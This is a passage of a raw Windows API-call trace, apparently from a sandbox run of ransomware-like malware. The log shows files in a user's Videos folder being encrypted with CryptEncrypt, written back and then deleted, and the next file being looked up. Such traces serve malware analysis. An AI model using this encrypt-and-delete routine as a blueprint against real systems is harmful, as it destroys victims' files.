hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0108.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0108.114] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.114] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.114] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0108.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0108.114] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x103a0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x103b0) returned 1 [0108.114] CharLowerBuffW (in: lpsz="byte[66481]", cchLength=0xb | out: lpsz="byte[66481]") returned 0xb [0108.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0108.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0108.114] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e088*=0x103a0, dwBufLen=0x103b0 | out: pbData=0x499a008*, pdwDataLen=0x144e088*=0x103b0) returned 1 [0108.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.172] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x103b0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x103b0, lpOverlapped=0x0) returned 1 [0108.174] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0108.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca790, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0108.175] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0108.175] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.175] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0108.175] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0108.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.175] FreeLibrary (hLibModule=0x756e0000) returned 1 [0108.175] CloseHandle (hObject=0x258) returned 1 [0108.176] CloseHandle (hObject=0x298) returned 1 [0108.178] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv", lpFilePart=0x0) returned 0x4c [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7908 [0108.178] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\cu3r8fst64g6xd.flv")) returned 0x20 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0108.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.179] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89a0da0, ftCreationTime.dwHighDateTime=0x1d5eeb6, ftLastAccessTime.dwLowDateTime=0xc72d3200, ftLastAccessTime.dwHighDateTime=0x1d5ec7e, ftLastWriteTime.dwLowDateTime=0xc72d3200, ftLastWriteTime.dwHighDateTime=0x1d5ec7e, nFileSizeHigh=0x0, nFileSizeLow=0x103a0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Cu3r8FST64g6XD.flv", cAlternateFileName="CU3R8F~1.FLV")) returned 0x41ac2c0 [0108.179] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\cu3r8fst64g6xd.flv")) returned 1 [0108.298] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89a0da0, ftCreationTime.dwHighDateTime=0x1d5eeb6, ftLastAccessTime.dwLowDateTime=0xc72d3200, ftLastAccessTime.dwHighDateTime=0x1d5ec7e, ftLastWriteTime.dwLowDateTime=0xc72d3200, ftLastWriteTime.dwHighDateTime=0x1d5ec7e, nFileSizeHigh=0x0, nFileSizeLow=0x103a0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Cu3r8FST64g6XD.flv", cAlternateFileName="CU3R8F~1.FLV")) returned 0 [0108.298] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7908 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0108.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0108.298] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 1 [0108.298] TranslateMessage (lpMsg=0x144ee2c) returned 0 [0108.298] DispatchMessageW (lpMsg=0x144ee2c) returned 0x0 [0108.298] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0108.299] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0108.299] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0108.299] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0108.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0108.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0108.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0108.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0108.299] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0108.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0108.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0108.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0108.300] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0108.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.301] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a8b2c0, ftCreationTime.dwHighDateTime=0x1d5e85a, ftLastAccessTime.dwLowDateTime=0x5dbb9c00, ftLastAccessTime.dwHighDateTime=0x1d5e858, ftLastWriteTime.dwLowDateTime=0x5dbb9c00, ftLastWriteTime.dwHighDateTime=0x1d5e858, nFileSizeHigh=0x0, nFileSizeLow=0x135eb, dwReserved0=0x0, dwReserved1=0x8, cFileName="DU9VQvjn.swf", cAlternateFileName="")) returned 0x41ac500 [0108.301] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0108.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0108.301] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0108.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0108.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0108.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, 